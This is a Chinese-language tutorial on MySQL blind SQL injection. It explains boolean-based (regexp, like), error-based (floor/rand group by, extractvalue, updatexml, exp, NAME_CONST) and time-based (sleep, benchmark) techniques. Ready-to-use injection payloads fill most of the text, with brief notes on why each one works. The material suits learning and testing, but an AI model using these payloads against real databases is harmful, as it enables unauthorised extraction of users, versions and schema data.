盲注

盲注分为三类：

（1）基于布尔的sql盲注；

（2）基于时间的sql盲注；

（3）基于报错的sql盲注；

1：基于布尔SQL盲注----------构造逻辑判断

首先我们先了解以下函数：

截取字符串相关函数

1,left(a,b) 从左侧取字符串a的前b位

2,,substr(a,b,c) 从b开始截取字符串a的长度为c

3,ascii()把字符串转化成ascii

4,mid(a,b,c)从位置b开始，截取a字符串的c位

5,ord()函数同ASCII

regexp正则注入

用法介绍：select user() regexp '^[a-z]';

列如：正则表达式的用法，user()结果为root，regexp为匹配root的正则表达式。

第二位可以用select user() regexp '^ro'来进行

当正确的时候显示结果为1，不正确的时候显示结果为0.

示例介绍：

 

I  select * from users where id=1 and 1=(if((user() regexp '^r'),1,0));

 

II     select * from users where id=1 and 1=(user() regexp'^ri');

 

通过if语句的条件判断，返回一些条件句，比如if等构造一个判断。根据返回结果是否等于0或者1进行判断。

 

 

III   select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1);

like匹配注入

和上述的正则类似，mysql在匹配的时候我们可以用Like进行匹配。

用法：select user() like'ro%';

 

2：基于报错的SQL盲注------构造payload让信息通过错误提示回显出来

Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a;  

//explain:此处有三个点，一是需要concat计数，二是floor，取得0 or 1，进行数据的重复，三是group by进行分组，但具体原理解释不是很通，大致原理为分组后数据计数时重复造成的错误。也有解释为mysql 的bug 的问题。但是此处需要将rand(0)，rand()需要多试几次才行。

以上语句可以简化成如下的形式。

select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2))

如果关键的表被禁用了，可以使用这种形式

 select count(*) from (select 1 union select null union 

select !1) group by concat(version(),floor(rand(0)*2)) 

如果rand被禁用了可以使用用户变量来报错

 select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)

 

▲select exp(~(select * FROM(SELECT USER())a))         //double数值类型超出范围

 

  //Exp()为以e为底的对数函数；版本在5.5.5及其以上

 

▲select !(select * from (select user())x) -（ps:这是减号） ~0  

 

 //bigint超出范围；~0是对0逐位取反，很大的版本在5.5.5及其以上

▲extractvalue(1,concat(0x7e,(select @@version),0x7e))  se//mysql对xml数据进行查询和修改的xpath函数，xpath语法错误

▲updatexml(1,concat(0x7e,(select @@version),0x7e),1)   //mysql对xml数据进行查询和修改的xpath函数，xpath语法错误

 

▲select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;

 

//mysql重复特性，此处重复了version，所以报错。

3:基于时间的SQL盲注----------延时注入

 

▲If(ascii(substr(database(),1,1))>115,0,sleep(5))%23  //if判断语句，条件为假，执行sleep

 

Ps：遇到以下这种利用sleep()延时注入语句
			

 

select sleep(find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8,9,.'));

 

该语句意思是在0-9之间找版本号的第一位。但是在我们实际渗透过程中，这种用法是不可取的，因为时间会有网速等其他因素的影响，所以会影响结果的判断。

 

 

 

▲UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM (select database() as current) as tb1;

 

   //BENCHMARK(count,expr)用于测试函数的性能，参数一为次数，二为要执行的表达式。可以让函数执行若干次，返回结果比平时要长，通过时间长短的变化，判断语句是否执行成功。这是一种边信道攻击，在运行过程中占用大量的cpu资源。推荐使用sleep()

 

函数进行注入。